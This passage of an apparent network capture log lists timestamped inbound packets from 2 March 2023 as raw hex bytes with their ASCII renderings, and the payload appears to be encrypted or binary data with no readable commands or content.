11 d1 17 da 9f 1d 7a e9 a1 ab 4e 44 d5 03 6e 5f af 58 76 6a 51 26 e9 dd 0e 92 a8 b7 2d c3 c2 98 60 b1 a2 Data Ascii: b"VK%)Z^c:Y[H`Dv:]cafr0X~3A!%_*\|Ut9~(&;:Q-,^yCL"GtGhe<eyFscB]11&hj@:B10W}6kHT5BCtzNDn_XvjQ&-`
2023-03-02 16:19:42 UTC	272	IN	Data Raw: 80 7f bc 27 4a 9f 11 af 53 f7 8e 50 fe 7d 9e 79 56 27 0b f0 a2 75 4d 84 c7 b6 ad 4c 2b 61 9a d4 83 0d 37 69 de 10 51 61 54 59 81 c5 15 b5 b4 e9 b1 d8 9d b7 3c 0e 2c 1e 7b 43 18 6b ba 31 ca 26 b1 fb 95 b5 33 17 b2 46 ba 19 2c 50 6d bb de 19 64 72 60 76 89 cc 48 e7 fe 02 bf aa 40 ab a8 67 98 61 66 36 23 63 25 b5 8c fb 50 0a 4b 79 68 aa 14 26 f6 da e0 18 e1 ee 97 4a a3 e7 2c 18 c6 83 9e 52 f3 2f 77 83 f1 0c af 46 0e 32 98 1a 0e aa f3 29 a0 9d 9e 52 3b 63 a3 00 d5 08 69 43 9a 1a 1c 52 3b 61 df b5 61 b8 11 1c b6 2b 97 3b 2f 34 c4 a4 cd 86 ed 45 7d ae 1e b7 15 b6 94 b4 d0 f9 04 1f c4 17 82 5e 9a cd fa de 8d 9b 4e 44 d7 f5 c1 95 09 ec 30 0a 4c b6 89 9f a5 f2 28 d9 f2 d9 40 f5 bc 39 ab 55 01 b2 d6 71 db 0d c1 13 93 ca 5d 84 7e 14 5e e2 ca 8d 13 88 3b e9 3c d9 93 Data Ascii: 'JSP}yV'uML+a7iQaTY<,{Ck1&3F,Pmdr`vH@gaf6#c%PKyh&J,R/wF2)R;ciCR;aa+;/4E}^ND0L(@9Uq]~^;<
2023-03-02 16:19:42 UTC	274	IN	Data Raw: d2 ff c2 c2 45 66 2d 4b 8b 65 e4 bc c3 fb 7f bf 6c 3d a9 2b b9 65 82 68 b4 3d 90 a9 99 b1 39 0c 3c c9 01 82 8a 10 66 44 48 9f c5 74 1e be 12 51 48 42 06 ed c5 b1 07 1a b9 ca 2e 15 66 6f ef 88 1c 23 15 16 f9 e4 3b 53 5d 94 a0 33 b4 e4 0f 64 64 e7 eb 5f 95 ae 00 68 d9 14 cd 35 87 c0 b2 d1 ad 41 df ee 3b 1e 08 fa 16 e7 dc 7c 4b ce 1a 4c 6e c1 22 8e ff 24 b0 60 1d 74 ba e5 f1 e7 86 54 9e 3a 80 d0 8b a6 37 51 47 74 c0 2b ad f7 03 f7 07 71 e3 22 e1 ea 74 d0 be 63 e2 2d 22 9c 9b 94 c8 80 09 19 12 e7 78 e0 90 22 45 67 b9 19 28 16 73 e2 88 67 65 95 f5 82 7a 69 8c 5f 9b 81 60 b6 36 d7 7e a0 09 89 d6 b6 d5 c6 a5 dd 28 46 a9 16 98 ee 33 87 cb 8a 94 0c 26 cf 4f ec 64 5c 74 71 c4 12 b5 b3 29 e3 08 58 99 8b 23 f1 c5 be 3a b9 ce 11 a1 56 e1 58 57 ff ff ad 08 8a a3 da 7d Data Ascii: Ef-Kel=+eh=9<fDHtQHB.fo#;S]3dd_h5A;\|KLn"$`tT:7QGt+q"tc-"x"Eg(sgezi_`6~(F3&Od\tq)X#:VXW}
2023-03-02 16:19:42 UTC	275	IN	Data Raw: 07 c1 0a 9e fe a6 25 cb d3 3d 3f ac 2f 0c 56 84 00 1f f0 b5 84 a3 97 f9 79 a4 3b 81 97 54 56 e1 99 73 2b 2d 9d 0a a7 74 cd 98 76 9a 32 3f 86 b5 21 0a 67 4c af 0d 23 f9 37 1b 48 24 b5 36 cc 4a 16 0f 01 17 d8 d2 f7 e4 7c 78 73 48 9b 0b 96 3c 61 a2 e3 95 95 87 e2 b6 bc c4 c5 fe 37 5f 28 e3 26 65 c3 62 7a a3 44 b7 f1 0c 9d 15 c9 3e c6 25 bf 98 f5 34 57 37 f3 88 fd b8 e0 60 f1 6e 9d 00 2f 1f 06 98 cc 41 dc 87 40 82 73 bb 71 2a 51 13 9b 83 21 21 0f 63 7d d9 8f b3 70 48 02 6f e8 60 17 c5 8d ea b5 92 19 8c e9 3c 2d 5b 53 e9 e6 2b 79 ae 6b c1 d0 b5 66 d5 86 80 a2 6e ad cb 40 0e fd 2e 13 a1 88 a6 4e 9b 86 f4 9f 3c 25 12 a5 d5 c5 2d 5b 1b 36 94 3f 52 e3 23 12 b1 2b be 29 83 25 52 ef ef 46 2a 76 29 13 1f aa 6b 2b ff 9a 86 fb ba cd bc 3c 25 0a 5f 78 15 e7 02 ff 55 67 Data Ascii: %=?/Vy;TVs+-tv2?!gL#7H$6J\|xsH<a7_(&ebzD>%4W7`n/A@sqQ!!c}pHo`<-[S+ykfn@.N<%-[6?R#+)%RFv)k+<%_xUg
2023-03-02 16:19:42 UTC	276	IN	Data Raw: 2d 18 63 01 c5 a6 4a 07 d8 51 b6 17 f7 a6 62 02 a6 e0 5f 39 69 42 29 1a 84 6e b2 e8 1a 8f ec 7d c3 c0 1b 75 15 32 5c f7 86 d3 11 b6 66 f8 26 22 d3 f0 be 79 07 b7 9d df 26 d9 4f 92 d0 8e 89 51 33 81 65 1c 59 7f d9 c3 45 54 c1 5e e1 e6 fd b1 00 1e ce 5c 5f a5 f6 22 a6 33 8f 96 21 58 df 67 fc 4d d2 f2 c5 8d e1 5d 6f 31 dc 61 be d3 32 53 6a 1f 5c 3b 8f e1 ab fc 50 f4 48 a9 6f 32 13 b3 97 02 a7 04 b9 69 79 55 9b 8d 67 e0 3b 36 9d 5a 3b c7 e4 3b 08 f7 06 af 23 cc e0 74 93 ab 16 cf 03 22 55 94 50 1c 39 be b5 13 ad 4e e3 8b 6f 25 cf 5e 47 64 b3 43 1a 8c 6b a3 b3 af 48 5c b2 5b c5 d8 6d b9 95 94 04 50 93 38 0e 9a 7c c2 79 b4 16 e7 15 fc 9e e3 e1 0a 0a 77 3a a9 19 e2 05 c0 41 5c c0 09 0a 18 f3 44 c9 6b 9c 6e ab 59 0e 81 5d 0b 2c fe b5 ed 86 28 7c b3 e5 21 ab 76 be Data Ascii: -cJQb_9iB)n}u2\f&"y&OQ3eYET^\_"3!XgM]o1a2Sj\;PHo2iyUg;6Z;;#t"UP9No%^GdCkH\[mP8\|yw:A\DknY],(\|!v
2023-03-02 16:19:42 UTC	277	IN	Data Raw: e7 66 35 0d 7e 21 48 7d 5b b4 26 29 93 59 2e b3 9c ed 58 09 00 51 be d5 87 fb 1d 91 74 1d ed f7 0c 76 85 a4 5e 14 ed 1f 4c 05 7f f2 8f 47 d4 b3 eb 86 75 77 52 c9 ab cd e0 01 17 0b bd 7c ee ac 2e 5f 14 cd 60 dd f1 6f 35 3e d8 27 ac 10 e0 3d 53 d5 69 91 c5 f6 a5 3e 5a 35 ec 99 58 7b cf a9 93 3b 69 0a 2e 5e 7a 44 0d 71 03 07 82 44 fb f2 10 eb 86 d3 33 a4 07 c4 6f 7b aa 3c 21 a0 5b 71 25 bf fb a5 cf 78 ae ab f2 5b c0 03 03 bf e3 d0 03 04 07 cf ad 27 1b 89 61 30 c1 69 e1 fa e7 90 54 d6 d9 22 8b d0 24 47 b4 96 0b 6f 46 40 5f 8d 60 0c 3b 77 e2 00 98 30 02 35 a8 60 e4 a2 c3 a3 bb 35 0c f1 07 d8 4c fe 84 b0 a4 04 ea 62 bb 10 d3 65 bc a8 aa 95 d7 37 61 c7 5b 8d 1b e3 f1 9f 7b c5 42 ba 9d 59 98 8a df a6 00 cf 6b fe e6 1a 06 e6 a6 f6 cd d5 fb 30 3a d7 1b c0 b8 0e e3 Data Ascii: f5~!H}[&)Y.XQtv^LGuwR\|._`o5>'=Si>Z5X{;i.^zDqD3o{<![q%x['a0iT"$GoF@_`;w05`5Lbe7a[{BYk0:
2023-03-02 16:19:42 UTC	279	IN	Data Raw: 95 5d c3 5f 8c 5d 42 a2 33 8f bb fb 56 b4 c9 52 a1 55 b9 7d 06 11 aa 3b 6d 45 e0 c1 9d 8c 7a 0b 5d 28 d0 5a ae 2b 78 e7 e4 e4 56 b9 44 5b 62 7a 94 62 6d b7 1d 28 13 2a 50 65 aa 89 4b 43 0b 63 48 0d b5 4b 60 5f 0b 76 67 93 a6 4e b3 67 2c 44 b7 1e e5 df 6c e0 20 55 c6 ff ae 30 5f 49 c4 7d 26 a6 6b 7a aa 7f 09 75 42 30 9d 28 4e bd 29 ce a1 40 c7 ce 23 0b 1e 42 84 09 26 bb a2 5e 75 5f 80 ef 34 e0 4d 27 46 a5 e2 09 3b 52 a9 ba 08 c2 a8 7e 5e 0d 50 c5 f8 d8 9e 54 81 26 ef a7 19 9f 86 5a ed 4c 97 9a 60 0b f0 e7 02 73 d1 f8 7e 4d 0f 8b 1a 93 c2 9d f7 35 96 2f 61 03 f8 78 ba 3b 29 88 95 9b 55 c6 3c a2 c7 0d a3 94 f9 30 c4 90 03 5f 57 62 f6 4c 19 6e fc 92 d1 3e 81 77 00 c7 e5 78 9d 9d 73 ee 5e fd 46 2d 2d b2 21 bb 60 68 81 82 cd 50 7c 64 4b 7b 2f 81 2f ad b4 ed df Data Ascii: ]_]B3VRU};mEz](Z+xVD[bzbm(*PeKCcHK`_vgNg,Dl U0_I}&kzuB0(N)@#B&^u_4M'F;R~^PT&ZL`s~M5/ax;)U<0_WbLn>wxs^F--!`hP\|dK{//
2023-03-02 16:19:42 UTC	280	IN	Data Raw: 54 bf b4 c7 b3 b5 0f 5a 60 08 ca ae e8 82 89 e3 21 30 e1 eb 8d 54 48 c3 80 fb 62 18 36 38 ea 9d b7 28 48 c9 61 aa 49 39 df a2 cf 98 d3 d1 28 d6 0f 7e 14 e2 8c 38 ac 04 e7 63 46 f2 d2 3e ae e8 2c 32 65 55 95 a0 bc 18 ed 56 a8 05 93 d6 7d 3d 3a 01 bb b4 fb 7f 7c 00 e3 b2 4f 48 a2 e9 e8 c3 49 af 14 e7 2f e4 26 21 2a 56 ea a4 71 c9 82 8a 4d 5d 5e aa d2 7e 92 79 af 87 2d df f6 3a 12 52 9d c2 80 b9 fa 11 d4 3a a0 8a ee 77 ef 24 00 3c 01 d8 52 8b 80 54 b3 2f de 80 7b f6 c0 2c 10 0e fe d1 0a 02 df ff d5 ee 1a 44 08 56 45 2a 66 ff 33 2f ab fb f4 da 4b 43 b8 58 e4 fb 82 a8 68 23 c5 47 b9 ca 1d 5d db ee c1 14 61 da c2 f2 e5 09 56 f3 45 65 06 98 3d 81 09 99 0c 7e 2b 1c af 41 26 4f bd 5f 51 db 5a 21 ff 7e 49 bc 43 61 83 37 52 9a 54 b8 3c 88 6b bd da 35 bf fa 70 89 ef Data Ascii: TZ`!0THb68(HaI9(~8cF>,2eUV}=:\|OHI/&!VqM]^~y-:R:w$<RT/{,DVEf3/KCXh#G]aVEe=~+A&O_QZ!~ICa7RT<k5p
2023-03-02 16:19:42 UTC	281	IN	Data Raw: 5d 41 53 77 58 eb e6 ff 7e 6a 77 71 5f 75 7e 5d 68 68 0d f1 66 02 af a2 43 f5 59 13 a8 ad 7e 40 20 57 10 5a 65 15 fb d3 d4 03 b6 55 44 9c bf b4 2e af 12 54 9a f2 b8 5f d1 fb 18 12 5a 29 14 f0 8d 9e 59 08 30 9b 8d 4c 90 7e f4 f3 3b b5 4a 92 7d fa 57 f5 92 d0 30 21 c1 e6 9a 90 a7 6a 09 3a a8 59 08 3f 39 70 ac 28 78 c0 d3 f6 b1 a6 33 16 d7 58 c7 87 a0 0b 7a d8 4c 30 6c 6d 1d 91 2b 8b 65 07 d4 45 3e 45 1e 7f 7b fe e0 07 c2 73 e7 dc 33 25 6f af a1 e6 e0 34 51 80 1e 2b c4 eb 59 3d e3 5a 14 3e 62 e5 33 23 ae c1 4c c6 48 a6 b2 03 57 26 df d9 09 35 6b ec a6 e0 8c e7 d7 53 d3 1f 2e fb a1 a0 fe cb a9 6d 4f 11 da 2a 22 c8 e4 d5 c6 fa 23 2f 14 a3 8e 3a 95 da 63 08 ff 2a 2a 3d de 15 de 08 67 0a 04 19 d5 85 45 f4 a8 ad 51 3b 70 7d ed 10 a9 ac 66 4b 7f c1 ba 8f f8 32 cc Data Ascii: ]ASwX~jwq_u~]hhfCY~@ WZeUD.T_Z)Y0L~;J}W0!j:Y?9p(x3XzL0lm+eE>E{s3%o4Q+Y=Z>b3#LHW&5kS.mO"#/:c*=gEQ;p}fK2
2023-03-02 16:19:42 UTC	282	IN	Data Raw: 38 c8 51 f0 84 82 ee d0 60 af 42 0e ca 07 06 4c 74 42 48 ff 74 a9 d7 99 db d0 41 37 15 18 d7 28 90 ee f6 9e 9c 01 10 22 f1 26 a9 03 82 d3 d9 61 36 f9 78 f8 d6 ea a1 57 38 ee fb cb ff 7d 10 67 8a 56 d8 f5 db e4 fd f4 fd ed 17 fb 3f 9b e3 a5 a4 6b e7 59 b4 07 3e 74 83 b5 38 c7 5d 5e 47 97 ff 18 c1 25 4d 8a 73 22 8e 88 da c2 Data Ascii: 8Q`BLtBHtA7("&a6xW8}gV?kY>t8]^G%Ms"
2023-03-02 16:19:42 UTC	282	IN	Data Raw: 76 c5 7a f5 50 07 57 99 0a 4a 4f a7 63 1b 04 09 50 da 54 69 24 94 71 74 57 f2 20 73 49 6c c0 52 88 84 7e f1 c4 21 0d 70 7a 49 8d 3d 62 48 79 39 4a 2e 1d 58 75 49 26 75 b6 79 58 76 89 a6 e3 ce db a4 88 07 59 58 a5 68 f3 e8 25 f0 11 16 b8 4a fe ce e2 69 32 03 03 60 c7 00 b8 33 1d 73 b6 e3 28 0a 6a 1d db 68 65 86 bf a0 d3 af 1d f3 01 6a 51 3f 4a dc 9c 4d 3c ee 60 4b 51 e0 ea b6 4b 3e da 88 43 c5 ab f6 48 22 ab 65 26 d4 f1 70 ff 80 4e 01 d7 14 ee a1 fe 83 85 de 60 0d cb 16 dc f7 2e 8d 0e 0f e9 b0 2e 21 d8 b4 8c 2f cc 46 df 6f 50 43 42 42 97 a8 d7 a0 ac e4 79 84 30 0b ca 9f 96 13 e6 a3 f8 f1 72 c0 be 43 0b 18 6e 55 63 d0 66 40 17 80 be 81 d6 f1 d0 7a e2 76 ee 80 1a d5 f5 1c d7 fe 72 db 90 25 7a 36 c1 31 07 82 58 95 62 ce d4 d0 d5 17 40 f5 a0 c0 55 70 eb 75 ad Data Ascii: vzPWJOcPTi$qtW sIlR~!pzI=bHy9J.XuI&uyXvYXh%Ji2`3s(jhejQ?JM<`KQK>CH"e&pN`..!/FoPCBBy0rCnUcf@zvr%z61Xb@Upu
2023-03-02 16:19:42 UTC	284	IN	Data Raw: 15 98 fe b7 9e 7c 34 cf 9d 32 96 9c fc 2a 36 81 fa a1 25 18 c7 69 95 08 33 cc c4 d0 52 db 27 a0 4c 76 1a 0d f5 9e 2f ec c9 88 00 52 d3 bc 7c 8a b8 d6 5b a8 93 f5 03 b2 6f e4 b0 e9 22 32 91 75 d7 2b 79 f2 91 61 50 c3 aa fb 6b 45 65 84 a2 d2 99 00 f5 b5 e9 f7 ea 96 23 bd 15 1d 7c e9 94 a5 73 8a 69 58 0c ab 5c 46 be 50 4d 17 f4 ec ed 1e 45 32 a0 00 c6 ad c5 4b 4a 94 8d 24 08 4f 27 d9 92 5b 57 f4 1c e4 58 12 ca cb 3d a5 8b 61 fc ec 19 c2 2b 2f 90 d2 db f7 f8 6c 12 e0 17 c6 d3 cd 86 f1 2c f4 f3 9d ae 25 70 da 0d 32 e2 8b 9e e8 c4 18 1a da 62 6e a4 48 2e da 7e 25 e5 02 1c aa 30 9e 37 eb f0 17 fe 88 bb 5e f5 c0 55 0f 35 c5 1f 61 4c a8 3c 10 4d 3a d3 a7 2d 89 e9 91 d9 c6 86 38 d5 fa f5 a6 0b 6a 91 45 e9 9e 43 75 38 c4 7e b7 7e 8c ef 40 9d 50 47 26 4b d9 95 67 7d Data Ascii: \|42*6%i3R'Lv/R\|[o"2u+yaPkEe#\|siX\FPME2KJ$O'[WX=a+/l,%p2bnH.~%07^U5aL<M:-8jECu8~~@PG&Kg}
2023-03-02 16:19:42 UTC	285	IN	Data Raw: b4 9a 79 9c ba 7b c1 f7 fc 5d 41 cb e7 fc e1 aa f4 b1 ca a9 43 3a 4a 39 13 2e b6 8b 1b 09 8d b5 d2 f3 cf 6b 04 f7 6b 18 da df ce 2b 1c 47 40 6f f6 d5 dc 89 92 cc f3 ba cb 5d 84 11 64 00 ad 6b b4 44 05 3a 6c 48 bf 7e aa 0f 6c 21 ce a4 80 c5 9b 77 e6 5b 91 b1 65 7f 49 a4 a1 71 3c f6 9b 14 91 21 b5 db e9 4f 04 f0 e9 8f 34 4d e8 5c fd bf 89 7d 62 a5 c4 b6 8b 22 af d5 29 9c fa ad b3 b5 ae a9 fd 3a 76 2f 1c 20 25 80 3b a3 ea 4d 16 f0 7c b5 ea eb 86 07 11 b7 a5 ae af 5c 9e 21 93 f3 1a 93 11 a7 43 4e 09 e6 ca c8 20 91 dd 0a 05 f2 9a 7f 10 9d af fa fb c3 cf b0 cf 7c 30 ec 83 2e a5 9f 90 f3 e5 27 9c 40 41 f2 fa 33 a2 f5 7f 18 eb d5 77 aa 23 9c 42 ff 3f 67 55 54 43 35 e3 b1 88 18 e7 57 2e 2c f7 b4 2a 02 ae 61 52 f1 12 65 42 18 67 4d aa fe 45 e5 3d 3a ff ed 4a 0a c4 Data Ascii: y{]AC:J9.kk+G@o]dkD:lH~l!w[eIq<!O4M\}b"):v/ %;M\|\!CN \|0.'@A3w#B?gUTC5W.,*aReBgME=:J
2023-03-02 16:19:42 UTC	286	IN	Data Raw: 88 e2 ab 22 49 80 76 a5 5c c1 2b bc 65 88 34 06 5a 0a 62 ce 5c b1 65 c6 44 b4 8c e1 d6 68 2f 2d dc 61 fc 83 ca 33 9d 7b b9 37 9c 5e 7c bf 93 3d 51 26 73 af e1 00 98 08 47 2a 33 58 c2 da 18 33 27 d9 21 c0 43 ba 12 73 85 80 19 29 92 a5 0a 7f 29 fa 65 99 1f 26 d2 e0 dc 49 5c 84 b7 e9 70 95 2f 3c 7c 47 5e e4 17 d0 15 82 48 f2 7f 50 18 f1 5d fb 2f 0c 54 f0 82 75 96 e5 8a bc d7 64 78 e3 1f dc 23 34 9b 87 1f 19 bd b9 f5 2c f6 35 4c 00 48 e1 5e 89 1c 20 fd 79 ba ca e6 e5 68 21 96 00 63 65 21 c3 85 ef 67 73 6f e4 92 4f e6 fa 89 53 1e 52 85 0e f6 1c c6 1c b7 98 8f 77 9e ec 10 0c 8b a9 c3 7e db e1 cf b8 27 49 cb ac 26 d7 ca 85 f0 ad e8 e9 e2 84 eb 53 9a e3 6e cf 3a 63 aa b9 ad 8b c5 bb bc 44 a3 61 72 99 ec ad fe c2 ed e1 67 2d e1 ec bd 44 8d e5 d1 23 da 8d 26 08 4e Data Ascii: "Iv\+e4Zb\eDh/-a3{7^\|=Q&sG*3X3'!Cs))e&I\p/<\|G^HP]/Tudx#4,5LH^ yh!ce!gsoOSRw~'I&Sn:cDarg-D#&N
2023-03-02 16:19:42 UTC	287	IN	Data Raw: 24 2d 23 b4 36 1c 95 ca 9a 4f ee de fb 4a e2 5d f8 41 24 14 4f b6 09 fd 40 00 31 1d c6 67 60 a8 39 82 cc 7d 35 94 3a c6 1f 73 41 b9 be 2d 50 15 30 f3 58 12 2b 7c 68 ea 45 d4 54 5c 31 4e 3b 37 fd 1f 2e 59 e3 74 72 b7 c3 9d 8f 83 4e fc 73 d5 fe 1f e2 f5 02 d1 23 40 26 02 b3 dc 7e ea 74 8c 00 5b 41 35 4a 20 00 34 35 5b a3 8b 15 19 1e eb d5 d6 92 97 26 14 86 8f 85 62 cf bd c3 f5 8a 71 95 7b f0 c0 29 b8 66 9f 47 83 5b 73 4b 35 6e d8 14 c7 30 12 2c be 31 23 22 6e 0c 34 ee 97 af ca 60 0e 6a fd 31 3c aa b5 b5 4f b5 76 89 c1 99 72 df 05 af ea 06 13 61 5b fe ae 9c 42 7d cf 29 4d e9 91 47 7c f6 1b 71 e8 49 33 d5 31 43 ac 6f 05 39 d7 6a d5 a2 43 2d 70 c7 e5 d8 dc ca c0 11 aa 05 74 de ec 4f c8 f8 ea 3f 34 83 24 70 6c 88 9f 21 ca f0 fc b1 50 37 22 32 fa 65 18 58 29 52 Data Ascii: $-#6OJ]A$O@1g`9}5:sA-P0X+\|hET\1N;7.YtrNs#@&~t[A5J 45[&bq{)fG[sK5n0,1#"n4`j1<Ovra[B})MG\|qI31Co9jC-ptO?4$pl!P7"2eX)R
2023-03-02 16:19:42 UTC	288	IN	Data Raw: db dd dd 9a 77 10 d3 83 44 25 78 43 62 03 fa 36 22 ac 0a 4f 1b 0b a5 1a 70 ed fb 9b 0f cc 2a b6 c0 43 81 e5 bd ec fc c7 35 39 7f 45 19 fb 9b 5c f1 d0 9c fc 0c 58 ab 18 ef 52 be ba 5a 07 00 95 eb f2 3d 56 a7 05 ed e8 44 49 89 9c 1a e0 a9 87 47 ff 27 8d a0 0d 79 21 5e 8a ff cc ee fc 34 16 0a f6 16 23 6d 44 54 26 fb 98 1f 4c 11 0d eb 6f 43 9b 1c 58 17 ef 3f 29 f7 56 b1 25 ed ab 55 fd 04 ce b5 d5 57 ba 7a ea 73 b0 76 76 70 c0 50 44 2e c3 e5 71 01 a6 ec ec b6 5c f5 da f1 9a 70 e3 12 13 f0 75 24 f5 45 cf 51 55 e7 2b b7 ef 23 16 6c d8 32 07 72 de fc 25 9d 46 70 f8 5b 09 d7 6d 32 22 4e 13 d0 de df 39 15 f0 86 af dd ee 01 94 af ba d2 0f 64 d2 63 c9 f5 21 d8 ce b6 3a 86 a2 ba 4b 48 18 a3 db bf 26 d8 19 e9 aa 38 b6 e4 d0 d0 b7 e8 22 2c 83 f4 f6 61 b1 c6 79 9c ce 7f Data Ascii: wD%xCb6"Op*C59E\XRZ=VDIG'y!^4#mDT&LoCX?)V%UWzsvvpPD.q\pu$EQU+#l2r%Fp[m2"N9dc!:KH&8",ay
2023-03-02 16:19:42 UTC	290	IN	Data Raw: 51 d2 08 d7 27 35 a1 55 47 13 dd 3f b2 e3 34 94 45 64 09 c3 71 81 3c 20 da b6 2c c0 cc 91 29 77 f1 f3 56 3b 6f 51 5a d8 24 15 25 ac c3 df 33 1f a3 90 63 e5 0d fa 5b 6d 39 39 69 c1 60 14 5f 66 ea e7 41 7f fe c8 c7 92 73 0a ce dc 6e 52 2b e2 55 f7 4d ff e0 63 77 c4 fe eb 35 29 ee 9a 53 fd f1 2a 83 27 06 17 40 2c 46 68 69 d1 9e 1e ed 26 00 45 30 f4 a5 3d dd 7d f4 4a d6 1e 04 53 70 ab d8 fa 6b 3b a5 e0 40 0d 8e 32 b6 27 d6 2e 2d 0d 13 84 eb cb 0f 0d bf 90 33 c3 72 1c f2 6a e2 2b a7 e5 7f 1f 05 62 49 d7 f4 af 6d d5 64 ad fe f9 49 d7 a3 e2 fa a8 52 2b 75 62 6f b5 23 1d 62 11 a2 b8 30 11 9a d5 21 c5 d6 f8 11 34 55 19 db ce fd ed d0 b2 b4 19 0c 69 b2 ef 62 fb 02 3f 70 ad 0e f7 ba d1 b5 8f 66 39 41 47 6f 43 9e 01 3c 96 9e e5 27 49 a9 a0 a0 a4 e7 ff 5c b2 22 80 f5 Data Ascii: Q'5UG?4Edq< ,)wV;oQZ$%3c[m99i`_fAsnR+UMcw5)S*'@,Fhi&E0=}JSpk;@2'.-3rj+bImdIR+ubo#b0!4Uib?pf9AGoC<'I\"
2023-03-02 16:19:42 UTC	291	IN	Data Raw: 3d aa b7 21 07 cd 58 23 a6 8a 19 aa 3b fc 2c 3f ac ff b4 55 56 61 15 94 af c5 6c 2a 5d b5 e3 2f 30 d3 ff 39 c8 67 fb 7e f7 6f 3b 92 cc 24 27 59 9f 95 98 c6 33 04 43 53 35 6e ba 1e da 49 ae a1 3d 11 f9 a1 85 81 79 9d 6e 61 ed bc c9 6d db dc 50 22 b3 57 d9 ee 93 30 c0 e9 05 8c 01 63 6c 5e a4 6e 62 a1 22 9e d0 80 36 c4 2d 19 5e 7e 1f e8 5b db a6 c4 7b 21 ef 69 a2 39 84 81 f4 b9 67 0d b1 64 56 bb c7 03 ea 18 ab 7d f3 36 08 14 0d 7d 4c 84 b8 aa 38 fb 17 4f 24 c1 c4 90 25 95 88 dc 24 51 81 19 ec 51 39 5f 43 1c 79 50 3f 8c 3e 31 55 ee 41 ab 80 8d 49 0a ff fd 4c 71 b9 e0 ea 29 ed 52 b5 ff 21 5e 44 51 7a e4 75 10 8e 70 74 ab 37 f8 60 d0 df 10 98 07 75 f7 b0 cb f3 d3 9d 84 0a 4d b9 b8 39 18 03 09 14 d4 51 ba 00 71 a4 53 14 f3 34 46 6c aa 80 db e8 e9 4f 8d 42 cc 31 Data Ascii: =!X#;,?UVal*]/09g~o;$'Y3CS5nI=ynamP"W0cl^nb"6-^~[{!i9gdV}6}L8O$%$QQ9_CyP?>1UAILq)R!^DQzupt7`uM9QqS4FlOB1
2023-03-02 16:19:42 UTC	292	IN	Data Raw: 7d 11 d4 de de 40 79 37 2b 3e b8 10 54 70 2a f9 b5 53 2d c9 73 08 7b 19 46 58 30 02 c3 9d ef 70 df d7 f0 9e ae 07 d9 23 ee 86 b1 2b d2 fa 42 f6 03 f7 90 54 32 f4 90 37 e6 3f 92 7d 95 9b 75 31 95 23 5c 16 50 8c c1 fa 6b de be 7c 94 41 d3 1d 40 18 c4 75 03 b1 89 5d 2d 89 f3 82 45 c5 1f 08 35 db 4c 1f a1 50 af 82 28 0b a4 f7 59 44 ab 57 58 a7 e0 3f 88 25 15 15 c6 9b 90 e4 35 8d a1 b9 28 47 92 2a 24 bc 27 92 78 5e 21 3b f5 0d cd 0d 81 8d d1 5e a1 41 72 fa c2 6e 3d 94 09 93 0d 04 ef 2b dd ac d9 4e 72 c5 5d 05 2a 50 2f 47 7d 26 8d 95 b1 fa ed e6 fe 76 e4 dc 59 de f4 50 a2 53 26 dc 33 9c 80 9a 18 6d 20 42 b8 7b 64 5c ae 74 83 e7 eb c1 d9 a2 33 7e bb 1b a6 b2 29 16 30 73 3b a3 63 f5 22 d0 48 e7 7b e1 85 6f 0e 7a fd b7 55 7e cc 04 1b da 0f 40 a9 6e f8 48 61 02 c2 Data Ascii: }@y7+>TpS-s{FX0p#+BT27?}u1#\Pk\|A@u]-E5LP(YDWX?%5(G$'x^!;^Arn=+Nr]*P/G}&vYPS&3m B{d\t3~)0s;c"H{ozU~@nHa
2023-03-02 16:19:42 UTC	293	IN	Data Raw: d7 49 b0 26 a4 d2 02 88 c1 1c dd 47 5b f4 a1 3e 28 6d 21 74 cb 8d 73 ed 2c 8f 2d cf 01 83 8e c1 4d fa cf 87 87 18 f5 39 e5 a0 6a e2 4d 9f 7a d1 3c a2 4c de 50 09 4c c3 a5 82 4e 65 c1 0c 18 de c8 3e b5 8c 20 28 8c df 43 43 b8 4e 12 8d ff 7b 19 d2 98 ab 86 c8 10 42 78 d3 51 d9 66 3c 2c 99 8f 4a 9c 7e 82 ab b0 ce 17 8d 48 eb d9 7d 70 75 4c 6e 31 16 d7 c9 44 8f 4b cd eb b0 cd 6c f8 40 aa 18 ed 54 05 e5 4f 41 5d f5 68 44 ac 36 17 fc 64 44 5a ca 48 4c 1a cb 7c 40 34 d0 43 ae ec 58 52 0a 41 cc 9e cc c8 77 4c f2 64 55 4a 86 d5 d5 bc 98 54 18 6c 65 f7 3a f3 a5 b5 c7 80 6a c0 e6 9f 87 72 c2 a5 33 a0 3b 82 e6 da 0d ef e4 9c 6c 30 52 97 ee f3 8b 46 49 c7 bf cf 4c 65 8c a7 70 7c 75 cb a9 55 69 00 67 03 3a 2b af 98 de 69 12 b2 c0 95 24 d6 40 86 b0 2a 17 c6 83 af 8e 55 Data Ascii: I&G[>(m!ts,-M9jMz<LPLNe> (CCN{BxQf<,J~H}puLn1DKl@TOA]hD6dDZHL\|@4CXRAwLdUJTle:jr3;l0RFILep\|uUig:+i$@*U
2023-03-02 16:19:42 UTC	295	IN	Data Raw: ee af ae cb 11 01 e1 ad 09 a2 58 cd 26 43 aa d7 83 9e 87 1f 47 0e 13 be 13 22 97 79 63 a6 5f ba 9e 04 31 7d d1 6f 40 c9 d2 39 0f 8a ca 73 72 7a 38 5f 61 0c 77 2a 92 73 ce 7a 25 a8 b5 6b 34 ad 28 4a 35 66 c0 74 4e 41 35 44 cc dc 62 b0 50 3f 53 94 c4 f9 f9 02 53 07 29 1b f6 98 66 57 f6 16 34 e8 89 71 bc 1f dd 4b 08 af 8f 6a 9a cd 9f 01 d2 b6 ea b8 50 c9 07 3a bb 04 bd 43 11 b5 17 cd 15 69 d2 46 54 a3 57 e8 0c b8 e2 88 48 04 13 f1 5a f9 b5 4c 84 19 f2 fe 0d 4b ac db b9 dd 9d 61 75 82 e8 f5 39 73 d7 ba 42 3f ae 9c 4d 34 a0 54 60 53 31 e6 e8 5f a9 0b b4 18 9c 3f 5b d4 8b e4 bb 1c ed 6c 06 b7 6e f9 c8 30 75 59 c4 c6 b9 a5 8d f3 05 73 1c 83 33 43 ed 96 5f a4 6f 78 ab 08 9b 70 0b 0d 67 6c dd ab d0 1d a4 00 4c 7d c6 97 0c e2 24 7b 1e 15 f2 09 e2 0d 0c 8b ca 34 4b Data Ascii: X&CG"yc_1}o@9srz8_aw*sz%k4(J5ftNA5DbP?SS)fW4qKjP:CiFTWHZLKau9sB?M4T`S1_?[ln0uYs3C_oxpglL}${4K
